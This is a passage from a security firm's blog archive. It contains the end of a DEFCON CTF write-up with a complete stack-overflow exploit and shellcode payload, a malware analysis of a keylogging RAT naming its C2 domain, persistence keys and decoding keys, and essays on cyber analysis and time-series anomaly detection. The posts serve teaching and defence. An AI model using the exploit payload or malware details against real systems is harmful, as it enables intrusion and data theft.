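encoded = "".join(f"%{b:02X}" for b in sled)

print(slots)         # 14
print(encoded[:12])  # %45%89%04%08
```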

One problem. When I go to edit the time variable I see that we have the <eip> value followed by a <bss> address in the time variable. This was required to survive the write from earlier. I will not be able to write to the text section of the binary so I cannot use this address for the ret sled. Because the number of addresses is even, I can point the return sled to a pop ret gadget and have a pop/ret sled instead. There is a pop just one byte before the previous ret address at 0x08048944. I will still need to put this address in 14 times but every other instance will not be executed.

My first attempt at this failed as well! When I looked at the stack, the pointer for the “date” variable was not where it should be. The length was correct but we were returning into NULLs. Looking a little closer, I noticed that the pointer for this variable ended with 0x00. Of course, the time variable was null terminating on the stack. My length was off by one. Since I am already doing a pop/ret sled the pointer immediately before the date pointer is not executed. It could really be anything. I made the time variable one byte shorter and FINALLY gained code execution outside of a debugger. Here is the completed formdata file and execution printing out /home/nonameyet/flag:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

%eb%38AABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%44%89%04%08%EC%F0%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04
-----------------------------13141138687192
Content-Disposition: form-data; name="date"

%66%81%EC%F0%01%83%E4%F8%EB%30%5E%89%F3%31%C9%31%C0%B0%05%CD%80%89%C3%89%F1%31%D2%B2%FF%31%C0%B0%03%CD%80%BB%FF%FF%FF%FF%F7%DB%89%F1%88%C2%31%C0%B0%04%CD%80%31%C0%B0%01%CD%80%E8%CB%FF%FF%FF%2F%68%6F%6D%65%2F%6E%6F%6E%61%6D%65%79%65%74%2F%66%6C%61%67%00
-----------------------------13141138687192--

$ ./nonameyet.cgi < formdata
Angry Rhinoceros And then I found five dollars.

The only thing left to do is to send this over a socket to the web server so that I can pull back the flag on the remote system. Too bad the service was offline by the time I completed the challenge.

There are other ways to go about landing this stack overflow. Another public write up is here (in Chinese). It looks like this team made a ROP chain to getenv() that would read in cookie data. The same stack overflow bug was used.

Big thanks to HJ and Legit BS for a fun CTF problem. I spent way too much time playing with it. If you enjoyed this walk through or have questions or comments, you are welcome to email me: svittitoe at endgame.com.

↧

How to Get Started in CTF

June 9, 2014, 11:30 am

Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs. The easiest way to start is to sign up for an introductory CTF like CSAW, Pico CTF, Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time.

If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging.

If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started.

1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “switch” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include:

2) Cryptography. While this is not my personal strength, here are some resources to check out:

3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started.

4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience.

5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. There are a few common vulnerability types you can learn in isolation: stack overflows, heap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through:

6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems.

Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics.

↧

Technical Analysis: Binary b41149.exe

June 15, 2014, 11:30 am

In keeping with the theme of my previous post, “malware never truly dies – it just keeps on compromising”, today I’d like to investigate a binary that surfaced a couple of months ago. While the binary itself is young, the domain it reaches back to for Command and Control (CnC) has been used by nefarious binaries - like Cryp_SpyEye, AUTOIT.Trojan.Agent-9 and TROJ_SPNR - since at least October 2012. Hence, this is another example of how “old” malware continues to compromise long after it has been discovered.

What really caught my eye about this binary was one of its obfuscation techniques. The literal file name of the binary is unknown, so for the purposes of examining it, I renamed it b41149.exe, after the first six characters of its SHA256 hash. The complete hash will be provided later in the file identifier section.

An initial look at b41149.exe revealed it to be a custom-packed binary with an internal file name of “microsft.exe”, complete with a Microsoft icon (see Figure 1).

Figure 1: Binary Icon

Even more interesting was an embedded JPEG at offset 11930A. As of this writing, no purpose for this JPEG has been uncovered. Could this be some type of calling card? Figure 2 reflects the embedded JPEG in a hex view while Figure 3 displays the actual image file.

Figure 2: Hex View of Embedded JPEG

Figure 3: Embedded JPEG Inside b41149.exe

Another curious aspect of b41149.exe, and undoubtedly much more important than the JPEG, was the fact that it contained a Unicode-encoded binary between offset 508B and offset 117C0A. This is the part that really caught my eye. I’ve seen embedded binaries obfuscated in this manner primarily in RTF files, and also in PDFs and DOCs, but I personally haven’t come across one yet that used this obfuscation scheme while embedded inside another binary. It turns out the embedded binary is the real workhorse here, and Figure 4 reflects how it appears inside b41149.exe.

Figure 4: Unicode-encoded Binary Inside b41149.exe

B41149.EXE in Runtime

Upon execution, b41149.exe self-replicates to C:\WINDOWS\System32\mony\System.exe with hidden attributes. In addition, a visibly noticeable command shell is opened. System.exe, the malware’s running process, then hooks to the malware-spawned command shell. However, upon reboot, System.exe hooks to the default browser rather than a command shell, but since the browser window isn’t opened this would not be visibly noticeable to the affected user. Additionally, during runtime, b41149.exe self-replicates to six other locations throughout the system and creates one copy of itself that has the following 10 bytes appended to it - 0xFE154DE7184501CD2325. The binary also sets several registry values and stores encoded keylog data as logs.dat in the logged-on user’s %AppData% folder. Once loaded, the running process attempts to connect to a.servecounterstrike.com over port 115, and it persists on a victim host through a registry RUN key as well as through a copy of the binary in Start Up. The following table provides a chronological gist of the malware on a victim host during runtime.

Table 1: Chronological Gist of Malware on an Infected Host

As previously stated, the Unicode-encoded binary embedded inside b41149.exe (reflected in Figure 4) is the real power of this malware - it does all the heavy lifting. As a stand-alone binary, it will do everything described in Table 1, except the self-replications, other than to %System%\mony\System.exe. In light of this, the remaining code in b41149.exe appears to be responsible for the other self-replications. However, before the embedded binary is functional (as a stand-alone), the PE Header must be fixed and 1,391 4-byte blocks of 0x00002000 must be removed. These 4-byte blocks of ‘filler’ are inserted every 400 bytes. The exact reason for this is unknown, but I would guess it’s to hinder reversing efforts. Once fixed, however, the binary will run independently and without any degradation of maliciousness.
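The filler removal step might look something like the Python sketch below. It rests on two assumptions the analysis above does not confirm: that each 4-byte filler block follows a run of exactly 400 payload bytes, and that the filler appears on disk in the byte order written above (00 00 20 00). The function name strip_filler is made up for the example, and the PE header repair is not covered.

```python
FILLER = bytes.fromhex("00002000")  # assumed on-disk byte order of the filler block
PERIOD = 400                        # assumed payload bytes between filler blocks


def strip_filler(data: bytes, period: int = PERIOD, filler: bytes = FILLER) -> bytes:
    """Copy payload runs of `period` bytes, skipping a filler block after each run."""
    out = bytearray()
    pos = 0
    while pos < len(data):
        out += data[pos:pos + period]
        pos += period
        # Only skip when the expected filler is really there, so unexpected
        # layouts are left untouched rather than silently corrupted.
        if data[pos:pos + len(filler)] == filler:
            pos += len(filler)
    return bytes(out)
```

Comparing the number of blocks removed against the 1,391 reported above would be a quick sanity check that the assumed layout matches the sample.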

The keylogged data file, logs.dat, is encoded with a 30-byte key, but not in its entirety. Each new process, such as notepad, a command shell, browser, etc., spawns a new line of keylogged data. And each line is delimited with #### (or 0x23232323). The key is then applied to each new line, following the delimiter. Deep dive analysis has not yet been done to uncover the actual encoding algorithm or loop. However, the encoded logs.dat file can be decoded by applying the following 30-byte key after each delimiter: 0E0A0B16050E0B0E160A05020304040C010B0E160604160A0B0604130B16. Figure 5 contains a hex view sample of the encoded logs.dat file.

Figure 5: Hex View of Encoded Keylogged Data in LOGS.DAT

The following table demonstrates the decoding process for the first line of logs.dat. Each encoded byte is XOR’d with its corresponding byte from the key, producing the decoded byte. For example 0x75 XOR with 0x0E becomes 0x7B; or in ASCII, u becomes {.

Table 2: Keylogger Decoding Scheme

Since the encoded line in Table 2 was only 9 bytes long, only the first 9 bytes of the key were utilized. However, the key does not resume from byte 10 on the next line of encoded text. It starts back from the beginning of the key (e.g. 0x0E0A0B, etc.) and it will repeat itself until that line of data concludes. To illustrate this further, the following table presents three different lines of encoded ASCII text followed by its decoded version. The alphabetic characters of the decoded text are upper case/lower case inverted, while the numeric and special characters are displaying normally.

Table 3: Decoded Keylog Data
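The decoding scheme described above can be sketched in a few lines of Python. The 30-byte key and the #### delimiter come from the analysis; the function names are invented for this example, and splitting on the delimiter assumes that the encoded data itself never happens to contain four consecutive 0x23 bytes.

```python
KEY = bytes.fromhex(
    "0E0A0B16050E0B0E160A05020304040C010B0E160604160A0B0604130B16"
)
DELIM = b"####"  # 0x23232323, separates the keylogged lines


def decode_line(line: bytes, key: bytes = KEY) -> bytes:
    """XOR one line with the key, starting at key byte 0 and wrapping as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(line))


def decode_log(blob: bytes) -> list:
    """Split logs.dat on the delimiter and decode each line independently."""
    return [decode_line(chunk) for chunk in blob.split(DELIM) if chunk]


print(decode_line(b"\x75"))  # b'{'
```

Since the decoded letters come out with their case inverted, calling .swapcase() on each decoded line should restore the original casing.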

The most critical component of this malware runs in memory, but it’s written to disc ever so briefly by b41149.exe. The temporary file, “XX—XX—XX.txt”, is resident on the system for only a fraction of a second in the logged-on user’s %Temp% directory. Once running, the malware-spawned command shell deletes it (as reflected above in Table 1). XX—XX—XX.txt is XOR encoded with 0xBC, and once decoded, it contains the name of the reach back CnC domain a.servecounterstrike.com, as well as a UPX-packed dynamic link library (DLL) file. Strings of the DLL suggest it contains remote access tool (RAT) capability. In addition, since the DLL runs in memory, and XX—XX—XX.txt does not remain resident on the victim host, its presence could be difficult to determine.

The beginning of XX—XX—XX.txt displays the un-encoded file structure path from where the malware was executed. This string is followed by the path of the running process, which is the self-replicated System.exe. Immediately after is where the XOR encoded CnC reach back domain and the connection port are located. A single byte XOR key, 0xBC, is used for this, and Figure 6 reflects a “before and after” encoding look at the beginning portion of XX—XX—XX.txt.

Figure 6: XX—XX—XX.txt Before and After Encoding

The DLL embedded inside XX—XX—XX.txt is near offset 1C192, but this is dependent upon the length of the path name from which the malware was executed. Figure 7 reflects a “before and after” encoding look at the embedded DLL’s DOS stub.

Figure 7: XOR Encoded DOS Stub Inside XX—XX—XX.TXT
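Because the DLL’s offset shifts with the length of the execution path, one way to locate it is to search for the XOR-encoded form of the standard DOS stub message. The Python sketch below illustrates the idea; the function names are hypothetical, and it assumes the embedded DLL carries the usual “This program cannot be run in DOS mode” text.

```python
XOR_KEY = 0xBC
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Apply a single-byte XOR; the same call both encodes and decodes."""
    return bytes(b ^ key for b in data)


def find_encoded_stub(blob: bytes) -> int:
    """Return the offset of the XOR-encoded DOS stub message, or -1 if absent."""
    return blob.find(xor_bytes(DOS_STUB))
```

Once the offset is known, decoding the bytes around it with xor_bytes should reveal the DLL’s header, and the same helper can be pointed at the encoded CnC domain and port near the start of the file.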

As stated above, the DLL is UPX packed, but once unpacked, it reveals some interesting strings that provide some insight into its functionality. Table 4 lists some strings of interest.

Table 4: Strings of Interest

Persistence is a key component of malware, and b41149.exe persists on the victim host through several mechanisms, such as the following registry RUN keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies: "C:\WINDOWS\system32\mony\System.exe"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HKLM: "C:\WINDOWS\system32\mony\System.exe"

In addition, a copy of the binary is stored in the user’s start up folder as WinUpdater.exe. However, 10 bytes are appended to the binary as shown in Figure 8.

Figure 8: Trailing Byte Comparison of B41149.EXE / WINUPDATER.EXE

An autorun.inf file is also created in the root of the C:\ directory. Below is the content of the INF file, which opens apphelp.exe - also located in the root of C.

[autorun]
open=apphelp.
ACTION=Perform a Virus Scan

One unusual aspect of this malware is that while the main action takes place in memory, it is actually very noisy in terms of activity on the victim host. It writes, deletes, then rewrites two files in rapid succession to the logged-on user’s %Temp% directory. The files are XxX.xXx and UuU.uUu. Each file contains the current timestamp of the victim host in an HH:MM:SS format. No other data is contained within those files. Interestingly, XxX.xXx is rewritten at half-second intervals, while UuU.uUu is rewritten every five seconds. Figure 9 displays the contents of these files captured moments apart from one another.

Figure 9: Content of XXX.XXX AND UUU.UUU

The most obvious sign of something being not quite right here is that upon execution, this binary spawns a command shell window for the user and everyone else to see. The shell is not user-interactive; nothing can be typed into it. However, if the shell is closed (or terminated), the malicious process, C:\WINDOWS\system32\mony\System.exe, restarts automatically. Interestingly, upon system reboot, the malicious process System.exe hooks to the default browser and runs as previously described, but it does not spawn a browser window. It’s possible that the visual command shell window is intended to trick the user into thinking there’s something wrong with the system, thus prompting a reboot.

Network Activity

As previously stated, the binary connects to a.servecounterstrike.com, which is compiled in memory. Upon execution of the binary, the victim host sends a DNS query for a.servecounterstrike.com, and once an IP address is returned, begins sending periodic SYN packets to the returned IP address over port 115, presumably until the attacker responds or until it receives further commands from its CnC node. Figure 10 shows the PCAP of a compromised host’s initial connection with the malicious domain. This activity was captured from within an enclosed virtual network.

Figure 10: Initial Connection from a Compromised Host

During the short period in which the compromised virtual machine was left online, no return attacker activity occurred, so it’s undetermined what would transpire in the long term if this were an actual compromised online host.

Stay tuned for a follow-up post once I do some deeper dive analysis of this binary. For now, I’ll leave you with some hashes. Enjoy.

File Identifiers

File: b41149.exe
Size: 1343488
MD5: f20b42fc2043bbc4dcd216f94adf6dd8
SHA1: 4d597d27e8a0b71276aee0dcd8c5fe5c2db094b0
SHA256: b41149a0142d04ac294e364131aa7d8b9cb1fd921e70f1ed263d9b5431c240a5
ssdeep: 6144:hEnCDKEJkKspH02n/M+WJ/04KLuqju11M+HDKsR:h9DdspH02004fqjujM+HGs
Compile Time: 4F605417 (Wed, 14 March 2012 08:17:27 UTC)
Compile Version: Microsoft Visual Basic 5.0 / 6.0
Internal File Name: Microsft.exe

File: embedded_ascii-encoded_bianry.exe (with fixed PE Header and “filler” byte blocks removed)
Size: 277869
MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92
SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b
SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3
ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: c:\WINDOWS\system32\mony\System.exe (dropped by embedded Unicode encoded binary)
Size: 277869
MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92
SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b
SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3
ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: embedded DLL in XX–XX–XX.txt
Size: 120320
MD5: c1bc1dfc1edf85e663718f38aac79fff
SHA1: 9d01c6d2b9512720ea7723e7dec5e3f6029aee3d
SHA256: 5468be638be5902eb3d30ce8b01b1ac34b1ee26b97711f6bca95a03de5b0db24
ssdeep: 3072:dk7/I/KbMm4oIP9zaj1WyWBiyhdYKC0iwsUukhh3a:dkDuK4m4jWjv+nCksfQB

File: embedded DLL in XX–XX–XX.txt (unpacked)
Size: 329728
MD5: f920cee005589f150856d311b4e5d363
SHA1: 2589fa5536331a53e9a264dd630af2bdb6f6fc00
SHA256: 1fd16ca095f1557cc8848b36633d4c570b10a2be26ec89d8a339c63c150d3b44
ssdeep: 6144:iQoh1rcU8kHOEkzsz+F97pk1nJJn7TB82R:j2RbHOEkzsaXmxn7T

↧

The Great Divide: Closing the Gap in Cyber Analysis

June 19, 2014, 11:30 am

In 2010, General Michael Flynn co-authored a report entitled Fixing Intel critiquing the threat-centric emphasis within counterinsurgency intelligence analysis. The report, which made waves in the intelligence community (IC), called for an organizational and cultural shift within the analytical and operational approach to counterinsurgency, highlighting the gap in data collection and the resulting lack of holistic situational awareness critical for decision-making. Recently, the Chief Analytic Methodologist at DIA, Josh Kerbel, reinforced these arguments while extending them beyond counterinsurgency to apply to all missions across the IC writ large. Noting that the IC is at a Kodak moment, he argues that the IC must move beyond the Cold War business model and modernize in light of the dynamic and diverse threats present in the current operating environment.

Having spent a significant amount of time both as an analyst and interviewing analysts across a wide range of intelligence agencies and Combatant Commands, I now see significant parallels within the cyber domain. While cyber is a much more nascent field, it is already widely recognized that there is a gap between the very tactical and technical nature of the cyber domain and the information relayed to leadership. The DoD’s inclusion of cyberspace as an official domain of warfare certainly indicates its relevance for the foreseeable future and there are plenty of lessons to learn, both from the CT realm as well as from the larger IC perspective, in order to make cyber analysis relevant for leadership. Two of the most pertinent lessons, which I’ll address in further detail, are: 1) contextualizing challenges and 2) translation between practitioners and leadership.

1) Contextualization: As both Kerbel and the Flynn report note, for more than a decade the IC has been preoccupied with a threat-centric view of terrorism, which in turn focuses on targeted collection. Similarly, the cyber domain currently seems to take a threat-centric approach, again with an emphasis on targeted collection. In both cases, an emphasis on the nodes omits the larger picture that leadership requires to make informed decisions. It is indicative of the proverbial inability to see the forest for the trees. Nevertheless, cyber intelligence should cross the strategic, operational, and tactical domains to provide insight at each level of analysis. There is great utility in both private and public organizations understanding the larger picture and context of the cyber challenges within the operating environment.

2) Translation required: Kerbel emphasizes the behavioral component of customer-driven production, noting analysts must understand what the policymakers are trying to accomplish and provide a service that meets those needs. This, he argues, is counter to the current strategy of assuming relevance of a product because it is based on unique information. This is identical to the disciplinary gaps seen today in the cyber domain. Too often, the hyper-technical delivery of cyber information and analysis to leadership is packaged in a language and format that quite simply are not useful for decision makers. Insights from cyber analysis will not reach their full potential if we cannot transform the technical jargon into a language that leaders can understand. Fixing Intel notes that the IC “is a culture that is strangely oblivious of how little its analytical products, as they now exist, actually influence commanders.” This gap arguably already haunts the cyber domain, where very technical products are either not directly relevant for or are incomprehensible to leadership. Until this necessary translation happens, and until we can move towards a common framework for the cyber domain, the divide between the cyber analysis and policy communities, and between leadership and cyber practitioners, will remain.

↧

Analysis: Three Observations About the Rise of the State in Shaping Cyberspace

July 8, 2014, 11:30 am

Last month commemorated the 100th anniversary of the start of World War I. It was a time when states were so interdependent and borders so porous that some call it the first era of globalization. In fact, immediately prior to World War I, many forecast that interdependence would be the predominant driving force for the foreseeable future, diminishing states’ tendencies toward war and nationalism. World War I immediately halted this extensive global interdependence, in large part due to rising nationalism and the growth of inward-facing policies. On the surface, there seems to be little in common between that era and the current Digital Age. However, the misguided presumption prior to World War I that interdependence would render states’ domestic interests obsolete is at risk of resurfacing in the cyber domain. Given the narrow focus on connectivity during previous waves of interdependence, here are three observations about the role of the state in the Digital Age worth considering:

1) In “borderless” cyberspace, national borders still matter. Similar to perspectives on the growth of interdependence prior to World War I, there is currently an emphasis on the borderless, connected nature of cyberspace and its uniform and omnipresent growth across the globe. While borders – both virtual and physical – have become more porous, the state nevertheless is increasingly impacting the structure and transparency of the Internet. From Russia’s recent expansion of web control to Brazilian-European cooperation for underground cables, there is a growing patchwork approach to the Internet – all guided by national interests to maintain control within state borders.

2) “Data Nationalism” is the new nationalism of the Digital Age. While traditional nationalism still exists, thanks to the information revolution it now manifests in more nuanced ways. “Data nationalism”, where countries seek to maintain control of data within their physical borders, has strong parallels to traditional nationalism. In both cases, nationalism serves as a means to shape and impact a state’s culture and identity. As history has shown, states – and the governments running them – aim to maintain sovereign control of their territory and stay in power. Nationalistic tendencies, especially state preservation, tend to strongly influence the depth and structure of connectivity among people and states. This was true one hundred years ago, and it is true today. States are disparately invoking national legislation and barriers to exert their “data nationalism” within a virtual world, possibly halting the great expansion of access and content that has occurred thus far. Just as nationalism and states’ interests eventually altered the path of the first era of globalization, it is essential to acknowledge the growing role of the state in shaping the Internet during the Digital Age.

3) Although a technical creation, the cyber domain is not immune from the social construct of states’ interests. During each big wave of globalization and technological revolution, the idea that interdependence will triumph and trump individual states’ interests emerges. However, this idea discounts the role of the state in continuing to shape and maintain sovereign control while simultaneously influencing the structure of the newly connected system. This is true even in the cyber realm, which is not immune to the self-interest of states. From the great firewall of China to various regulations over content in Western European countries to Internet blackouts in Venezuela, states are increasingly leveraging their power to influence Internet access and control data and content within their borders. This has led to a growing discussion of the “Splinternet” or Balkanization of the Internet, which refers to the disparate patchwork of national policies and regulations emerging globally. Although this runs counter to the ideals of openness and transparency on which the Internet was founded, it comes as no surprise to international relations scholars that states would seek to control (as best as possible) the cyber domain.

The role of self-interested states has largely been absent from discussions pertaining to the future of the Internet. Fortunately, there is a growing dialogue on the impact of national barriers and disparate national legislation on the Internet’s evolution. A recent article in The Atlantic reflects on the growing fractionalization of the Internet, and is reminiscent of earlier eras’ articles about the hub-and-spoke system of international trade. Similarly, a Pew Research Center poll highlights concern over the potential fractionalization of the Internet due to state intervention. As we continue to consider how the Internet will evolve and how policymakers will respond to an increasingly interconnected digital domain, we must not ignore the inherent tendency of states to demarcate both physical and virtual control within their sovereign borders.

↧

Time Series Analysis for Network Security

July 16, 2014, 11:30 am

Last week, I had the opportunity to attend a conference that had been on my radar for a long time. I’ve been using scientific Python tools for about 10 years, so it was with great excitement that I attended SciPy 2014 in Austin. I enjoyed meeting the developers of this excellent open-source software as well as other enthusiastic users like me. I learned a great deal from talks about some Python tools I haven’t yet tried but should really already be using, like conda, bokeh, and others. I also gave a talk describing how I have been using the SciPy stack of software in my work here at Endgame. In this post, I’ll summarize and expand on the first half of my presentation.

My work at Endgame has focused on collecting and tracking metrics associated with network and device behavior. By developing a model of normal behavior on these metrics, I can detect when that behavior changes and alert users. There are several examples of security threats and events that would lead to anomalies in these metrics. Finding them and alerting our users to these threats as soon as possible is critical.

The first step in finding anomalies in network and device behavior is collecting the data and organizing it into a collection of time series. Our data pipeline here at Endgame changes rapidly as we develop tools and figure out what works and what doesn’t. For the purposes of this example, the network traffic data flows in the following way:

Apache Kafka is a distributed messaging system that views messages as a log. As data comes in, Kafka takes care of receiving it and distributing it to other systems that have subscribed to it. A separate system archives this data to HDFS for later processing over historical records. Reading the data from the Kafka servers allows my database to stay as current as possible. This allows me to send alerts to users very soon after a potential problem occurs. Reading historical data from HDFS allows me to backfill metrics once I create a new one or modify an existing one. After all of this data is read and processed, I fill a Redis database with the time series of each metric I’m tracking.

The three Python tools that I use throughout this process are kairos to manage the time series database, kafka-python to read from Kafka, and pyspark to read from HDFS. I chose each project for its ease of use and ability to get up to speed quickly. They all have simple interfaces that abstract away complicated behavior and allow you to focus on your own data flow. Also, by using a Python interface to old and new data, I can share the code that processes and compares data against the metrics I’ve developed.

I gave my presentation on the third and final day of SciPy. Up until that point, I hadn’t heard Apache Spark or pyspark mentioned once. Because of this, I spent an extra minute or two evangelizing for the project. Later, the Blaze developers gave a similar endorsement. It’s good to know that I’m not alone in the scientific Python community in loving Spark. In fact, before using Spark, I had been running Pig scripts in order to collect historical data. This required a bunch of extra work to run the data through the Python processing scripts I had already developed for the real-time side of things. Using Spark definitely simplified this process.

The end result of all this work is an easily accessible store of all the metrics. With just a couple lines of code, I can extract the metric I’m interested in and convert it to a pandas DataFrame. From there, I can analyze it using all of the scientific computing tools available in Python. Here’s an example:

# Make a connection to our kairos database
from redis import Redis
from kairos import Timeseries
intervals = {"days": {"step": 60, "steps": 2880}, "months": {"step": 1800, "steps": 4032}}
rclient = Redis("localhost", 6379)
ktseries = Timeseries(rclient, type="histogram", intervals=intervals)

# Read data from our kairos database
# (metric_name holds the name of the metric to extract)
from pandas import DataFrame, to_datetime
series = ktseries.series(metric_name, "months")
ts, fields = zip(*series.items())
df = DataFrame({"data": fields}, index=to_datetime(ts, unit="s"))

And here’s an example time series showing the number of times an IP has responded to connection requests:

Thanks for reading. Next week I’ll talk about the different models I’ve built to make predictions and find anomalies in the time series that I’ve collected. If you’re interested in viewing the slides from my presentation, I’ve shared them here.

↧

Building Security Threat Models for Time Series Analysis

July 21, 2014, 11:30 am

In my last post, I talked about the different Python projects I used to put together a pipeline for network security data. In this post, I’ll talk about how I used the scientific computing software stack in Python (numpy, scipy, and pandas) to build a model around that data and detect outliers. We left off last week with a pandas DataFrame containing example data:

This plot is an example taken from the database that shows the number of times an IP responds to connection requests over time. To find potential security threats, I’d like to find outliers in this and any other time series. Doing so requires a model of what I believe is normal behavior based on past data.

The simplest approach to building a model is to take the mean and standard deviation of the data I’ve seen so far. I can then treat the mean as a prediction of the next value and generate an alert when the actual value exceeds a configurable number of standard deviations from that prediction. The results of that simple algorithm are shown below:

In this plot and the ones that follow, the actual number of connections observed is in blue. The green window is centered on the prediction made for that time bin and extends one standard deviation in each direction. A red vertical line is drawn when the actual data is a configurable distance away from that prediction window.
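The mean-and-standard-deviation baseline described above can be sketched in a few lines of pandas. This is only an illustration under assumptions: the function name mean_std_outlier, the stdlimit default, and the toy data are made up for the example and are not taken from the original analysis.

```python
import pandas as pd

def mean_std_outlier(conns, stdlimit=3.0):
    """Flag points that sit far from the mean of all earlier observations."""
    # expanding() uses every observation seen so far; shift(1) keeps the
    # current point out of its own prediction.
    pred = conns.expanding(min_periods=2).mean().shift(1)
    std = conns.expanding(min_periods=2).std().shift(1)
    stds = (conns - pred) / std
    return pd.DataFrame({"conns": conns,
                         "pred": pred,
                         "std": std,
                         "outlier": stds.abs() > stdlimit})

# Toy data (hypothetical): a steady series with one obvious spike.
conns = pd.Series([10.0, 12.0, 11.0, 13.0, 12.0, 11.0, 40.0, 12.0])
result = mean_std_outlier(conns)
print(result[result["outlier"]])
```

Only the spike of 40 is flagged here. Because the mean and standard deviation are computed over all past data, a single large value inflates the window for every later point, which is one reason this baseline tracks the data poorly.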

As you can see in this first model, the prediction window is not highly correlated with the data and the spread is very large. A better model is to fit a sine curve to the data using the tools that scipy provides. The prediction is the fit value and the standard deviation is derived from the residuals to the fit:

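import numpy as np
from scipy.optimize import leastsq

# Model: an overall level p[0] modulated by a sine wave with a one-day period.
# p[1] is the relative amplitude and p[2] is the phase offset in seconds.
def fitfunc(p, x):
  return p[0] * (1 - p[1] * np.sin(2 * np.pi / (24 * 3600) * (x + p[2])))

def residuals(p, y, x):
  return y - fitfunc(p, x)

def fit(tsdf):
  # Average the data in each time-of-day bin before fitting
  tsgb = tsdf.groupby(tsdf.timeofday).mean()
  p0 = np.array([tsgb["conns"].mean(), 1.0, 0.0])
  plsq, suc = leastsq(residuals, p0, args=(np.array(tsgb["conns"]), np.array(tsgb.index)))
  return plsq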

At least on weekdays, the prediction mirrors the data better and the window is tighter. But we can improve these models even further. When looking through the data, it became apparent to me that different kinds of metrics required totally different models. I therefore developed a method for classifying the time series by asking two different questions:

Does this metric show a weekly pattern (i.e., different behavior on weekdays and weekends)?
Does this metric show a daily pattern?

In order to answer the first question, I fit the sine curve displayed above to the data on weekdays and weekends separately and compared the overall level of the fit (the p[0] parameter in the code above). If the levels differed, then I would build a model for the weekday data separately from the weekend data. If the overall levels of those fits were similar, then I kept that time series intact.

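import pandas as pd

def weekend_ratio(tsdf):
  # Tag each row as weekday (Monday through Friday) or weekend,
  # and compute its time of day in seconds
  tsdf['weekday'] = pd.Series(tsdf.index.weekday < 5, index=tsdf.index)
  tsdf['timeofday'] = (tsdf.index.second + tsdf.index.minute * 60 + tsdf.index.hour * 3600)

  # Fit weekdays and weekends separately, then compare the overall levels (p[0])
  wdayplsq = fit(tsdf[tsdf.weekday == 1])
  wendplsq = fit(tsdf[tsdf.weekday == 0])
  return wendplsq[0] / wdayplsq[0]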

In the plot above, I show the weekday and weekend fits in red. For this data, the behavior of the time series on weekdays and weekends was different enough that I decided to treat them separately.
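One way to turn the weekend-to-weekday level ratio into that decision is a simple tolerance check. The sketch below is hypothetical: the function name has_weekly_pattern and the 25% tolerance are assumptions for illustration, since the threshold actually used is not stated here.

```python
def has_weekly_pattern(ratio, tolerance=0.25):
    """Return True when the weekend level differs from the weekday level.

    ratio is the weekend fit level divided by the weekday fit level.
    tolerance is an assumed cutoff: a ratio within 1 +/- tolerance is
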